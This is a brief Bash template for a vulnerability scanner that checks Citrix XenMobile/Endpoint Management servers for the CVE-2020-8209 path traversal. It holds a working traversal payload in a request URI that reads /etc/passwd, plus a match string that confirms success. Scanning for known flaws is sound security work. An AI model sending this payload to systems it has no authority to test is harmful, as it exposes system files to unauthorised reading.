Files
UltyScan/templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh

9 lines
296 B
Bash

AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'